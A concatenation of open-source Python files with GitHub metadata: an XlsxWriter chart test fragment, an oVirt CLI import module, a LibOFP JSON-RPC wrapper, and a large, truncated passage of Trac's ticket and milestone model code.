chart.add_series({'values': '=Sheet1!$C$1:$C$5'})
chart.set_x_axis({'crossing': 3})
chart.set_y_axis({'crossing': 8})
worksheet.insert_chart('E9', chart)
workbook.close()
self.assertExcelEqual()
|
{
"content_hash": "01845ed209ae8d305031809862e91237",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 68,
"avg_line_length": 27.22222222222222,
"alnum_prop": 0.5693877551020409,
"repo_name": "jkyeung/XlsxWriter",
"id": "23dd0b815240895d7598921a5c3103f056a7d786",
"size": "1643",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "xlsxwriter/test/comparison/test_chart_crossing02.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Batchfile",
"bytes": "5113"
},
{
"name": "CSS",
"bytes": "16544"
},
{
"name": "HTML",
"bytes": "13100"
},
{
"name": "Makefile",
"bytes": "7819"
},
{
"name": "Perl",
"bytes": "3504"
},
{
"name": "Python",
"bytes": "2430294"
},
{
"name": "Shell",
"bytes": "6064"
}
],
"symlink_target": ""
}
|
from ovirtcli.command.action import ActionCommand
from ovirtcli.command.add import AddCommand
from ovirtcli.command.connect import ConnectCommand
from ovirtcli.command.console import ConsoleCommand
from ovirtcli.command.remove import RemoveCommand
from ovirtcli.command.disconnect import DisconnectCommand
from ovirtcli.command.help import HelpCommand
from ovirtcli.command.list import ListCommand
from ovirtcli.command.ping import PingCommand
from ovirtcli.command.show import ShowCommand
from ovirtcli.command.status import StatusCommand
from ovirtcli.command.update import UpdateCommand
from ovirtcli.command.history import HistoryCommand
|
{
"content_hash": "e35ae008ade34cd3154b15d5ed6bb908",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 57,
"avg_line_length": 49.38461538461539,
"alnum_prop": 0.8785046728971962,
"repo_name": "oVirt/ovirt-engine-cli",
"id": "fb2b847dedb61387c72fb4a9990c7ece97c1e881",
"size": "643",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/ovirtcli/command/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "870"
},
{
"name": "Python",
"bytes": "365026"
},
{
"name": "Shell",
"bytes": "309"
}
],
"symlink_target": ""
}
|
"""
Simple Python Wrapper for LibOFP.
No external dependencies; uses builtin json module.
"""
import json
import os
import struct
import subprocess
import sys
def getDefaultPort():
try:
return int(os.environ.get('LIBOFP_DEFAULT_PORT'))
except:
return 6653
DEFAULT_OPENFLOW_PORT = getDefaultPort()
class _JsonObject:
def __init__(self, d):
self.__dict__ = d
def __repr__(self):
return str(self.__dict__)
class LibOFP(object):
"""
Implements Python Driver to LibOFP.
Example:
ofp = libofp.LibOFP()
for event in ofp:
if event.method == 'OFP.MESSAGE' and event.params.type == 'PACKET_IN':
handlePacketIn(ofp, event)
To send a message:
ofp.send({
'type': 'BARRIER_REQUEST',
'datapath_id': datapath
})
}
"""
def __init__(self, driverPath='/usr/local/bin/libofp',
openflowAddr=('', DEFAULT_OPENFLOW_PORT),
listen=True):
"""
Open a connection to the driver and prepare to receive events.
openflowAddr - Address for OpenFlow driver to listen on. Specified
as a 2-tuple (host, port). Specify host of '' for all
local addresses.
"""
self._sockInput = None
self._sockOutput = None
self._process = None
self._openDriver(driverPath)
self._xid = 2
self._sendDescriptionRequest()
if listen:
self._sendListenRequest(openflowAddr)
def _openDriver(self, driverPath):
assert driverPath
# Driver's path is specified, so launch the executable.
# Communicate with the driver using stdin and stdout (in binary mode).
self._process = subprocess.Popen([driverPath, 'jsonrpc', '--loglevel=info', '--binary-protocol'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE, bufsize=0)
# Our input is the other process's stdout.
self._sockInput = self._process.stdout
self._sockOutput = self._process.stdin
def __del__(self):
if self._sockInput:
self._sockInput.close()
if self._sockOutput and self._sockOutput is not self._sockInput:
self._sockOutput.close()
def send(self, params):
self._call('OFP.SEND', id=None, **params)
def __iter__(self):
return self
def __next__(self):
line = _read_next(self._sockInput)
if not line:
raise StopIteration()
return json.loads(line, object_hook=_JsonObject)
def _call(self, method, id=None, **params):
rpc = {
'method': method,
'params': params
}
if id is not None:
rpc['id'] = id
if method == 'OFP.SEND' and 'xid' not in params:
params['xid'] = self._xid
self._xid += 1
self._write(json.dumps(rpc).encode('utf-8'))
def _sendListenRequest(self, openflowAddr):
self._call('OFP.LISTEN', endpoint='[%s]:%d' % openflowAddr, options=['FEATURES_REQ'])
def _sendDescriptionRequest(self):
self._call('OFP.DESCRIPTION', id=99999)
msg = next(self)
print(msg, file=sys.stderr)
assert msg.id == 99999
assert msg.result.api_version == '0.9'
assert len(msg.result.sw_desc) > 0
assert msg.result.versions == [1, 2, 3, 4, 5, 6]
def _write(self, msg):
hdr = struct.pack('>L', (len(msg) << 8) | 0xF5)
self._sockOutput.write(hdr + msg)
def _read_next(stream):
"""Read next event from stream.
"""
hdr, = struct.unpack('>L', stream.read(4))
assert (hdr & 0xFF) == 0xF5
result = stream.read(hdr >> 8)
print('>>> %s' % result)
return result
|
{
"content_hash": "659eaa45064ffe03ab8cdd1958b17cb9",
"timestamp": "",
"source": "github",
"line_count": 141,
"max_line_length": 105,
"avg_line_length": 27.02836879432624,
"alnum_prop": 0.5657307793230123,
"repo_name": "byllyfish/oftr",
"id": "965c5594d351538fa51dd396144b20187dea97ed",
"size": "3811",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "example/python/libofp_json.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "2989"
},
{
"name": "C++",
"bytes": "2157366"
},
{
"name": "CMake",
"bytes": "42760"
},
{
"name": "Dockerfile",
"bytes": "2897"
},
{
"name": "Go",
"bytes": "1531"
},
{
"name": "Python",
"bytes": "21034"
},
{
"name": "Shell",
"bytes": "18878"
}
],
"symlink_target": ""
}
|
from __future__ import with_statement
import re
from datetime import datetime
from trac.attachment import Attachment
from trac.core import TracError
from trac.resource import Resource, ResourceNotFound
from trac.ticket.api import TicketSystem
from trac.util import embedded_numbers, partition
from trac.util.text import empty
from trac.util.datefmt import from_utimestamp, to_utimestamp, utc, utcmax
from trac.util.translation import _
__all__ = ['Ticket', 'Type', 'Status', 'Resolution', 'Priority', 'Severity',
'Component', 'Milestone', 'Version', 'group_milestones']
def _fixup_cc_list(cc_value):
"""Fix up cc list separators and remove duplicates."""
cclist = []
for cc in re.split(r'[;,\s]+', cc_value):
if cc and cc not in cclist:
cclist.append(cc)
return ', '.join(cclist)
class Ticket(object):
# Fields that must not be modified directly by the user
protected_fields = ('resolution', 'status', 'time', 'changetime')
@staticmethod
def id_is_valid(num):
return 0 < int(num) <= 1L << 31
# 0.11 compatibility
time_created = property(lambda self: self.values.get('time'))
time_changed = property(lambda self: self.values.get('changetime'))
def __init__(self, env, tkt_id=None, db=None, version=None):
"""
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
self.env = env
if tkt_id is not None:
tkt_id = int(tkt_id)
self.resource = Resource('ticket', tkt_id, version)
self.fields = TicketSystem(self.env).get_ticket_fields()
self.std_fields, self.custom_fields, self.time_fields = [], [], []
for f in self.fields:
if f.get('custom'):
self.custom_fields.append(f['name'])
else:
self.std_fields.append(f['name'])
if f['type'] == 'time':
self.time_fields.append(f['name'])
self.values = {}
if tkt_id is not None:
self._fetch_ticket(tkt_id)
else:
self._init_defaults()
self.id = None
self._old = {}
exists = property(lambda self: self.id is not None)
def _init_defaults(self):
for field in self.fields:
default = None
if field['name'] in self.protected_fields:
# Ignore for new - only change through workflow
pass
elif not field.get('custom'):
default = self.env.config.get('ticket',
'default_' + field['name'])
else:
default = field.get('value')
options = field.get('options')
if default and options and default not in options:
try:
default = options[int(default)]
except (ValueError, IndexError):
self.env.log.warning('Invalid default value "%s" '
'for custom field "%s"'
% (default, field['name']))
if default:
self.values.setdefault(field['name'], default)
def _fetch_ticket(self, tkt_id):
row = None
if self.id_is_valid(tkt_id):
# Fetch the standard ticket fields
for row in self.env.db_query("SELECT %s FROM ticket WHERE id=%%s" %
','.join(self.std_fields), (tkt_id,)):
break
if not row:
raise ResourceNotFound(_("Ticket %(id)s does not exist.",
id=tkt_id), _("Invalid ticket number"))
self.id = tkt_id
for i, field in enumerate(self.std_fields):
value = row[i]
if field in self.time_fields:
self.values[field] = from_utimestamp(value)
elif value is None:
self.values[field] = empty
else:
self.values[field] = value
# Fetch custom fields if available
for name, value in self.env.db_query("""
SELECT name, value FROM ticket_custom WHERE ticket=%s
""", (tkt_id,)):
if name in self.custom_fields:
if value is None:
self.values[name] = empty
else:
self.values[name] = value
def __getitem__(self, name):
return self.values.get(name)
def __setitem__(self, name, value):
"""Log ticket modifications so the table ticket_change can be updated
"""
if name in self.values and self.values[name] == value:
return
if name not in self._old: # Changed field
self._old[name] = self.values.get(name)
elif self._old[name] == value: # Change of field reverted
del self._old[name]
if value:
if isinstance(value, list):
raise TracError(_("Multi-values fields not supported yet"))
field = [field for field in self.fields if field['name'] == name]
if field and field[0].get('type') != 'textarea':
value = value.strip()
self.values[name] = value
def get_value_or_default(self, name):
"""Return the value of a field or the default value if it is undefined
"""
try:
value = self.values[name]
return value if value is not empty else self.get_default(name)
except KeyError:
pass
def get_default(self, name):
"""Return the default value of a field."""
field = [field for field in self.fields if field['name'] == name]
if field:
return field[0].get('value', '')
def populate(self, values):
"""Populate the ticket with 'suitable' values from a dictionary"""
field_names = [f['name'] for f in self.fields]
for name in [name for name in values.keys() if name in field_names]:
self[name] = values.get(name, '')
# We have to do an extra trick to catch unchecked checkboxes
for name in [name for name in values.keys() if name[9:] in field_names
and name.startswith('checkbox_')]:
if name[9:] not in values:
self[name[9:]] = '0'
def insert(self, when=None, db=None):
"""Add ticket to database.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
assert not self.exists, 'Cannot insert an existing ticket'
if 'cc' in self.values:
self['cc'] = _fixup_cc_list(self.values['cc'])
# Add a timestamp
if when is None:
when = datetime.now(utc)
self.values['time'] = self.values['changetime'] = when
# The owner field defaults to the component owner
if self.values.get('owner') == '< default >':
default_to_owner = ''
if self.values.get('component'):
try:
component = Component(self.env, self['component'])
default_to_owner = component.owner # even if it's empty
except ResourceNotFound:
# No such component exists
pass
# If the current owner is "< default >", we need to set it to
# _something_ else, even if that something else is blank.
self['owner'] = default_to_owner
# Perform type conversions
values = dict(self.values)
for field in self.time_fields:
if field in values:
values[field] = to_utimestamp(values[field])
# Insert ticket record
std_fields = []
custom_fields = []
for f in self.fields:
fname = f['name']
if fname in self.values:
if f.get('custom'):
custom_fields.append(fname)
else:
std_fields.append(fname)
with self.env.db_transaction as db:
cursor = db.cursor()
cursor.execute("INSERT INTO ticket (%s) VALUES (%s)"
% (','.join(std_fields),
','.join(['%s'] * len(std_fields))),
[values[name] for name in std_fields])
tkt_id = db.get_last_id(cursor, 'ticket')
# Insert custom fields
if custom_fields:
db.executemany(
"""INSERT INTO ticket_custom (ticket, name, value)
VALUES (%s, %s, %s)
""",
[(tkt_id, c, self[c]) for c in custom_fields])
self.id = tkt_id
self.resource = self.resource(id=tkt_id)
self._old = {}
for listener in TicketSystem(self.env).change_listeners:
listener.ticket_created(self)
return self.id
def save_changes(self, author=None, comment=None, when=None, db=None,
cnum='', replyto=None):
"""
Store ticket changes in the database. The ticket must already exist in
the database. Returns False if there were no changes to save, True
otherwise.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
:since 1.0: the `cnum` parameter is deprecated, and threading should
be controlled with the `replyto` argument
"""
assert self.exists, "Cannot update a new ticket"
if 'cc' in self.values:
self['cc'] = _fixup_cc_list(self.values['cc'])
props_unchanged = all(self.values.get(k) == v for k, v in self._old.iteritems())
if (not comment or not comment.strip()) and props_unchanged:
return False # Not modified
if when is None:
when = datetime.now(utc)
when_ts = to_utimestamp(when)
if 'component' in self.values:
# If the component is changed on a 'new' ticket
# then owner field is updated accordingly. (#623).
if self.values.get('status') == 'new' \
and 'component' in self._old \
and 'owner' not in self._old:
try:
old_comp = Component(self.env, self._old['component'])
old_owner = old_comp.owner or ''
current_owner = self.values.get('owner') or ''
if old_owner == current_owner:
new_comp = Component(self.env, self['component'])
if new_comp.owner:
self['owner'] = new_comp.owner
except TracError:
# If the old component has been removed from the database
# we just leave the owner as is.
pass
with self.env.db_transaction as db:
db("UPDATE ticket SET changetime=%s WHERE id=%s",
(when_ts, self.id))
# find cnum if it isn't provided
if not cnum:
num = 0
for ts, old in db("""
SELECT DISTINCT tc1.time, COALESCE(tc2.oldvalue,'')
FROM ticket_change AS tc1
LEFT OUTER JOIN ticket_change AS tc2
ON tc2.ticket=%s AND tc2.time=tc1.time
AND tc2.field='comment'
WHERE tc1.ticket=%s ORDER BY tc1.time DESC
""", (self.id, self.id)):
# Use oldvalue if available, else count edits
try:
num += int(old.rsplit('.', 1)[-1])
break
except ValueError:
num += 1
cnum = str(num + 1)
if replyto:
cnum = '%s.%s' % (replyto, cnum)
# store fields
for name in self._old.keys():
if name in self.custom_fields:
for row in db("""SELECT * FROM ticket_custom
WHERE ticket=%s and name=%s
""", (self.id, name)):
db("""UPDATE ticket_custom SET value=%s
WHERE ticket=%s AND name=%s
""", (self[name], self.id, name))
break
else:
db("""INSERT INTO ticket_custom (ticket,name,value)
VALUES(%s,%s,%s)
""", (self.id, name, self[name]))
else:
db("UPDATE ticket SET %s=%%s WHERE id=%%s"
% name, (self[name], self.id))
db("""INSERT INTO ticket_change
(ticket,time,author,field,oldvalue,newvalue)
VALUES (%s, %s, %s, %s, %s, %s)
""", (self.id, when_ts, author, name, self._old[name],
self[name]))
# always save comment, even if empty
# (numbering support for timeline)
db("""INSERT INTO ticket_change
(ticket,time,author,field,oldvalue,newvalue)
VALUES (%s,%s,%s,'comment',%s,%s)
""", (self.id, when_ts, author, cnum, comment))
old_values = self._old
self._old = {}
self.values['changetime'] = when
for listener in TicketSystem(self.env).change_listeners:
listener.ticket_changed(self, comment, author, old_values)
return int(cnum.rsplit('.', 1)[-1])
def get_changelog(self, when=None, db=None):
"""Return the changelog as a list of tuples of the form
(time, author, field, oldvalue, newvalue, permanent).
While the other tuple elements are quite self-explanatory,
the `permanent` flag is used to distinguish collateral changes
that are not yet immutable (like attachments, currently).
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
sid = str(self.id)
when_ts = to_utimestamp(when)
if when_ts:
sql = """
SELECT time, author, field, oldvalue, newvalue, 1 AS permanent
FROM ticket_change WHERE ticket=%s AND time=%s
UNION
SELECT time, author, 'attachment', null, filename,
0 AS permanent
FROM attachment WHERE type='ticket' AND id=%s AND time=%s
UNION
SELECT time, author, 'comment', null, description,
0 AS permanent
FROM attachment WHERE type='ticket' AND id=%s AND time=%s
ORDER BY time,permanent,author
"""
args = (self.id, when_ts, sid, when_ts, sid, when_ts)
else:
sql = """
SELECT time, author, field, oldvalue, newvalue, 1 AS permanent
FROM ticket_change WHERE ticket=%s
UNION
SELECT time, author, 'attachment', null, filename,
0 AS permanent
FROM attachment WHERE type='ticket' AND id=%s
UNION
SELECT time, author, 'comment', null, description,
0 AS permanent
FROM attachment WHERE type='ticket' AND id=%s
ORDER BY time,permanent,author
"""
args = (self.id, sid, sid)
return [(from_utimestamp(t), author, field, oldvalue or '',
newvalue or '', permanent)
for t, author, field, oldvalue, newvalue, permanent in
self.env.db_query(sql, args)]
def delete(self, db=None):
"""Delete the ticket.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
with self.env.db_transaction as db:
Attachment.delete_all(self.env, 'ticket', self.id, db)
db("DELETE FROM ticket WHERE id=%s", (self.id,))
db("DELETE FROM ticket_change WHERE ticket=%s", (self.id,))
db("DELETE FROM ticket_custom WHERE ticket=%s", (self.id,))
for listener in TicketSystem(self.env).change_listeners:
listener.ticket_deleted(self)
def get_change(self, cnum=None, cdate=None, db=None):
"""Return a ticket change by its number or date.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
if cdate is None:
row = self._find_change(cnum)
if not row:
return
cdate = from_utimestamp(row[0])
ts = to_utimestamp(cdate)
fields = {}
change = {'date': cdate, 'fields': fields}
for field, author, old, new in self.env.db_query("""
SELECT field, author, oldvalue, newvalue
FROM ticket_change WHERE ticket=%s AND time=%s
""", (self.id, ts)):
fields[field] = {'author': author, 'old': old, 'new': new}
if field == 'comment':
change['author'] = author
elif not field.startswith('_'):
change.setdefault('author', author)
if fields:
return change
def delete_change(self, cnum=None, cdate=None):
"""Delete a ticket change identified by its number or date."""
if cdate is None:
row = self._find_change(cnum)
if not row:
return
cdate = from_utimestamp(row[0])
ts = to_utimestamp(cdate)
with self.env.db_transaction as db:
# Find modified fields and their previous value
fields = [(field, old, new)
for field, old, new in db("""
SELECT field, oldvalue, newvalue FROM ticket_change
WHERE ticket=%s AND time=%s
""", (self.id, ts))
if field != 'comment' and not field.startswith('_')]
for field, oldvalue, newvalue in fields:
# Find the next change
for next_ts, in db("""SELECT time FROM ticket_change
WHERE ticket=%s AND time>%s AND field=%s
LIMIT 1
""", (self.id, ts, field)):
# Modify the old value of the next change if it is equal
# to the new value of the deleted change
db("""UPDATE ticket_change SET oldvalue=%s
WHERE ticket=%s AND time=%s AND field=%s
AND oldvalue=%s
""", (oldvalue, self.id, next_ts, field, newvalue))
break
else:
# No next change, edit ticket field
if field in self.custom_fields:
db("""UPDATE ticket_custom SET value=%s
WHERE ticket=%s AND name=%s
""", (oldvalue, self.id, field))
else:
db("UPDATE ticket SET %s=%%s WHERE id=%%s"
% field, (oldvalue, self.id))
# Delete the change
db("DELETE FROM ticket_change WHERE ticket=%s AND time=%s",
(self.id, ts))
# Fix the last modification time
# Work around MySQL ERROR 1093 with the same table for the update
# target and the subquery FROM clause
db("""UPDATE ticket SET changetime=(
SELECT time FROM ticket_change WHERE ticket=%s
UNION
SELECT time FROM (
SELECT time FROM ticket WHERE id=%s LIMIT 1) AS t
ORDER BY time DESC LIMIT 1)
WHERE id=%s
""", (self.id, self.id, self.id))
self._fetch_ticket(self.id)
def modify_comment(self, cdate, author, comment, when=None):
"""Modify a ticket comment specified by its date, while keeping a
history of edits.
"""
ts = to_utimestamp(cdate)
if when is None:
when = datetime.now(utc)
when_ts = to_utimestamp(when)
with self.env.db_transaction as db:
# Find the current value of the comment
old_comment = False
for old_comment, in db("""
SELECT newvalue FROM ticket_change
WHERE ticket=%s AND time=%s AND field='comment'
""", (self.id, ts)):
break
if comment == (old_comment or ''):
return
# Comment history is stored in fields named "_comment%d"
# Find the next edit number
fields = db("""SELECT field FROM ticket_change
WHERE ticket=%%s AND time=%%s AND field %s
""" % db.like(),
(self.id, ts, db.like_escape('_comment') + '%'))
rev = max(int(field[8:]) for field, in fields) + 1 if fields else 0
db("""INSERT INTO ticket_change
(ticket,time,author,field,oldvalue,newvalue)
VALUES (%s,%s,%s,%s,%s,%s)
""", (self.id, ts, author, '_comment%d' % rev,
old_comment or '', str(when_ts)))
if old_comment is False:
# There was no comment field, add one, find the original author
# in one of the other changed fields
old_author = None
for old_author, in db("""
SELECT author FROM ticket_change
WHERE ticket=%%s AND time=%%s AND NOT field %s LIMIT 1
""" % db.like(),
(self.id, ts, db.like_escape('_') + '%')):
db("""INSERT INTO ticket_change
(ticket,time,author,field,oldvalue,newvalue)
VALUES (%s,%s,%s,'comment','',%s)
""", (self.id, ts, old_author, comment))
else:
db("""UPDATE ticket_change SET newvalue=%s
WHERE ticket=%s AND time=%s AND field='comment'
""", (comment, self.id, ts))
# Update last changed time
db("UPDATE ticket SET changetime=%s WHERE id=%s",
(when_ts, self.id))
self.values['changetime'] = when
def get_comment_history(self, cnum=None, cdate=None, db=None):
"""Retrieve the edit history of a comment identified by its number or
date.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
if cdate is None:
row = self._find_change(cnum)
if not row:
return
ts0, author0, last_comment = row
else:
ts0, author0, last_comment = to_utimestamp(cdate), None, None
with self.env.db_query as db:
# Get last comment and author if not available
if last_comment is None:
last_comment = ''
for author0, last_comment in db("""
SELECT author, newvalue FROM ticket_change
WHERE ticket=%s AND time=%s AND field='comment'
""", (self.id, ts0)):
break
if author0 is None:
for author0, last_comment in db("""
SELECT author, newvalue FROM ticket_change
WHERE ticket=%%s AND time=%%s AND NOT field %s LIMIT 1
""" % db.like(),
(self.id, ts0, db.like_escape('_') + '%')):
break
else:
return
# Get all fields of the form "_comment%d"
rows = db("""SELECT field, author, oldvalue, newvalue
FROM ticket_change
WHERE ticket=%%s AND time=%%s AND field %s
""" % db.like(),
(self.id, ts0, db.like_escape('_comment') + '%'))
rows = sorted((int(field[8:]), author, old, new)
for field, author, old, new in rows)
history = []
for rev, author, comment, ts in rows:
history.append((rev, from_utimestamp(long(ts0)), author0,
comment))
ts0, author0 = ts, author
history.sort()
rev = history[-1][0] + 1 if history else 0
history.append((rev, from_utimestamp(long(ts0)), author0,
last_comment))
return history
def _find_change(self, cnum):
"""Find a comment by its number."""
scnum = str(cnum)
with self.env.db_query as db:
for row in db("""
SELECT time, author, newvalue FROM ticket_change
WHERE ticket=%%s AND field='comment'
AND (oldvalue=%%s OR oldvalue %s)
""" % db.like(),
(self.id, scnum, '%' + db.like_escape('.' + scnum))):
return row
# Fallback when comment number is not available in oldvalue
num = 0
for ts, old, author, comment in db("""
SELECT DISTINCT tc1.time, COALESCE(tc2.oldvalue,''),
tc2.author, COALESCE(tc2.newvalue,'')
FROM ticket_change AS tc1
LEFT OUTER JOIN ticket_change AS tc2
ON tc2.ticket=%s AND tc2.time=tc1.time
AND tc2.field='comment'
WHERE tc1.ticket=%s ORDER BY tc1.time
""", (self.id, self.id)):
# Use oldvalue if available, else count edits
try:
num = int(old.rsplit('.', 1)[-1])
except ValueError:
num += 1
if num == cnum:
break
else:
return
# Find author if NULL
if author is None:
for author, in db("""
SELECT author FROM ticket_change
WHERE ticket=%%s AND time=%%s AND NOT field %s LIMIT 1
""" % db.like(),
(self.id, ts, db.like_escape('_') + '%')):
break
return (ts, author, comment)
def simplify_whitespace(name):
"""Strip spaces and remove duplicate spaces within names"""
if name:
return ' '.join(name.split())
return name
class AbstractEnum(object):
type = None
ticket_col = None
def __init__(self, env, name=None, db=None):
if not self.ticket_col:
self.ticket_col = self.type
self.env = env
if name:
for value, in self.env.db_query("""
SELECT value FROM enum WHERE type=%s AND name=%s
""", (self.type, name)):
self.value = self._old_value = value
self.name = self._old_name = name
break
else:
raise ResourceNotFound(_("%(type)s %(name)s does not exist.",
type=self.type, name=name))
else:
self.value = self._old_value = None
self.name = self._old_name = None
exists = property(lambda self: self._old_value is not None)
def delete(self, db=None):
"""Delete the enum value.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
assert self.exists, "Cannot delete non-existent %s" % self.type
with self.env.db_transaction as db:
self.env.log.info("Deleting %s %s", self.type, self.name)
db("DELETE FROM enum WHERE type=%s AND value=%s",
(self.type, self._old_value))
# Re-order any enums that have higher value than deleted
# (close gap)
for enum in self.select(self.env):
try:
if int(enum.value) > int(self._old_value):
enum.value = unicode(int(enum.value) - 1)
enum.update()
except ValueError:
pass # Ignore cast error for this non-essential operation
TicketSystem(self.env).reset_ticket_fields()
self.value = self._old_value = None
self.name = self._old_name = None
def insert(self, db=None):
"""Add a new enum value.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
assert not self.exists, "Cannot insert existing %s" % self.type
self.name = simplify_whitespace(self.name)
if not self.name:
raise TracError(_('Invalid %(type)s name.', type=self.type))
with self.env.db_transaction as db:
self.env.log.debug("Creating new %s '%s'", self.type, self.name)
if not self.value:
row = db("SELECT COALESCE(MAX(%s), 0) FROM enum WHERE type=%%s"
% db.cast('value', 'int'),
(self.type,))
self.value = int(float(row[0][0])) + 1 if row else 0
db("INSERT INTO enum (type, name, value) VALUES (%s, %s, %s)",
(self.type, self.name, self.value))
TicketSystem(self.env).reset_ticket_fields()
self._old_name = self.name
self._old_value = self.value
def update(self, db=None):
"""Update the enum value.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
assert self.exists, "Cannot update non-existent %s" % self.type
self.name = simplify_whitespace(self.name)
if not self.name:
raise TracError(_("Invalid %(type)s name.", type=self.type))
with self.env.db_transaction as db:
self.env.log.info("Updating %s '%s'", self.type, self.name)
db("UPDATE enum SET name=%s,value=%s WHERE type=%s AND name=%s",
(self.name, self.value, self.type, self._old_name))
if self.name != self._old_name:
# Update tickets
db("UPDATE ticket SET %s=%%s WHERE %s=%%s"
% (self.ticket_col, self.ticket_col),
(self.name, self._old_name))
TicketSystem(self.env).reset_ticket_fields()
self._old_name = self.name
self._old_value = self.value
@classmethod
def select(cls, env, db=None):
"""
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
with env.db_query as db:
for name, value in db("""
SELECT name, value FROM enum WHERE type=%s ORDER BY
""" + db.cast('value', 'int'),
(cls.type,)):
obj = cls(env)
obj.name = obj._old_name = name
obj.value = obj._old_value = value
yield obj
class Type(AbstractEnum):
type = 'ticket_type'
ticket_col = 'type'
class Status(object):
def __init__(self, env):
self.env = env
@classmethod
def select(cls, env, db=None):
for state in TicketSystem(env).get_all_status():
status = cls(env)
status.name = state
yield status
class Resolution(AbstractEnum):
type = 'resolution'
class Priority(AbstractEnum):
type = 'priority'
class Severity(AbstractEnum):
type = 'severity'
class Component(object):
def __init__(self, env, name=None, db=None):
"""
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
self.env = env
self.name = self._old_name = self.owner = self.description = None
if name:
for owner, description in self.env.db_query("""
SELECT owner, description FROM component WHERE name=%s
""", (name,)):
self.name = self._old_name = name
self.owner = owner or None
self.description = description or ''
break
else:
raise ResourceNotFound(_("Component %(name)s does not exist.",
name=name))
exists = property(lambda self: self._old_name is not None)
def delete(self, db=None):
"""Delete the component.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
assert self.exists, "Cannot delete non-existent component"
with self.env.db_transaction as db:
self.env.log.info("Deleting component %s", self.name)
db("DELETE FROM component WHERE name=%s", (self.name,))
self.name = self._old_name = None
TicketSystem(self.env).reset_ticket_fields()
def insert(self, db=None):
"""Insert a new component.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
assert not self.exists, "Cannot insert existing component"
self.name = simplify_whitespace(self.name)
if not self.name:
raise TracError(_("Invalid component name."))
with self.env.db_transaction as db:
self.env.log.debug("Creating new component '%s'", self.name)
db("""INSERT INTO component (name,owner,description)
VALUES (%s,%s,%s)
""", (self.name, self.owner, self.description))
self._old_name = self.name
TicketSystem(self.env).reset_ticket_fields()
def update(self, db=None):
"""Update the component.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
assert self.exists, "Cannot update non-existent component"
self.name = simplify_whitespace(self.name)
if not self.name:
raise TracError(_("Invalid component name."))
with self.env.db_transaction as db:
self.env.log.info("Updating component '%s'", self.name)
db("""UPDATE component SET name=%s,owner=%s, description=%s
WHERE name=%s
""", (self.name, self.owner, self.description,
self._old_name))
if self.name != self._old_name:
# Update tickets
db("UPDATE ticket SET component=%s WHERE component=%s",
(self.name, self._old_name))
self._old_name = self.name
TicketSystem(self.env).reset_ticket_fields()
@classmethod
def select(cls, env, db=None):
"""
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
for name, owner, description in env.db_query(
"SELECT name, owner, description FROM component ORDER BY name"):
component = cls(env)
component.name = component._old_name = name
component.owner = owner or None
component.description = description or ''
yield component
class Milestone(object):
def __init__(self, env, name=None, db=None):
self.env = env
if name:
self._fetch(name, db)
else:
self.name = None
self.due = self.completed = None
self.description = ''
self._to_old()
@property
def resource(self):
return Resource('milestone', self.name) ### .version !!!
def _fetch(self, name, db=None):
for row in self.env.db_query("""
SELECT name, due, completed, description
FROM milestone WHERE name=%s
""", (name,)):
self._from_database(row)
break
else:
raise ResourceNotFound(_("Milestone %(name)s does not exist.",
name=name), _("Invalid milestone name"))
exists = property(lambda self: self._old['name'] is not None)
is_completed = property(lambda self: self.completed is not None)
is_late = property(lambda self: self.due and
self.due < datetime.now(utc))
def _from_database(self, row):
name, due, completed, description = row
self.name = name
self.due = from_utimestamp(due) if due else None
self.completed = from_utimestamp(completed) if completed else None
self.description = description or ''
self._to_old()
def _to_old(self):
self._old = {'name': self.name, 'due': self.due,
'completed': self.completed,
'description': self.description}
def delete(self, retarget_to=None, author=None, db=None):
"""Delete the milestone.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
with self.env.db_transaction as db:
self.env.log.info("Deleting milestone %s", self.name)
db("DELETE FROM milestone WHERE name=%s", (self.name,))
# Retarget/reset tickets associated with this milestone
now = datetime.now(utc)
tkt_ids = [int(row[0]) for row in
db("SELECT id FROM ticket WHERE milestone=%s",
(self.name,))]
for tkt_id in tkt_ids:
ticket = Ticket(self.env, tkt_id, db)
ticket['milestone'] = retarget_to
comment = "Milestone %s deleted" % self.name # don't translate
ticket.save_changes(author, comment, now)
self._old['name'] = None
TicketSystem(self.env).reset_ticket_fields()
for listener in TicketSystem(self.env).milestone_change_listeners:
listener.milestone_deleted(self)
def insert(self, db=None):
"""Insert a new milestone.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
self.name = simplify_whitespace(self.name)
if not self.name:
raise TracError(_("Invalid milestone name."))
with self.env.db_transaction as db:
self.env.log.debug("Creating new milestone '%s'", self.name)
db("""INSERT INTO milestone (name, due, completed, description)
VALUES (%s,%s,%s,%s)
""", (self.name, to_utimestamp(self.due),
to_utimestamp(self.completed), self.description))
self._to_old()
TicketSystem(self.env).reset_ticket_fields()
for listener in TicketSystem(self.env).milestone_change_listeners:
